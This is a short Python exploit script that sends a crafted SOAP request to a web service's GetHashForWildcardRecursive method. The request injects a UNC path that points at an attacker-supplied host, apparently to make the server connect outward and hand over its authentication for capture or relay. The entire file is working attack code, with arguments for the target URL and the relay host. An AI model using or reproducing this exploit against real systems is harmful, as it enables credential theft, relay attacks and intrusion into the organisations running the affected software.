import argparse
import requests
import urllib3
urllib3.disable_warnings()

XML_PAYLOAD = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <GetHashForWildcardRecursive xmlns="http://tempuri.org/">
            <wildcard>\\\\{}\\tmp\\file1.txt</wildcard> 
        </GetHashForWildcardRecursive>
    </soap:Body>
</soap:Envelope>
"""


def exploit(url, relay_target):
    h = {
            "Content-Type": "text/xml",
            "Soapaction": "http://tempuri.org/GetHashForWildcardRecursive",
        }
    xml_payload = XML_PAYLOAD.format(relay_target)
    print(xml_payload)
    try:
        r = requests.post(f"{url}/WSVulnerabilityCore/VulCore.asmx", data=xml_payload, headers=h, verify=False, timeout=30)
        print(r.text)
        print(r.status_code)
    except TimeoutError:
        # Expected to timeout given it keeps connection open for process duration
        pass

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', help='The base URL of the target', required=True)
    parser.add_argument('-t', '--target', help='The target IP to reach out to', type=str, required=True)
    args = parser.parse_args()

    exploit(args.url, args.target)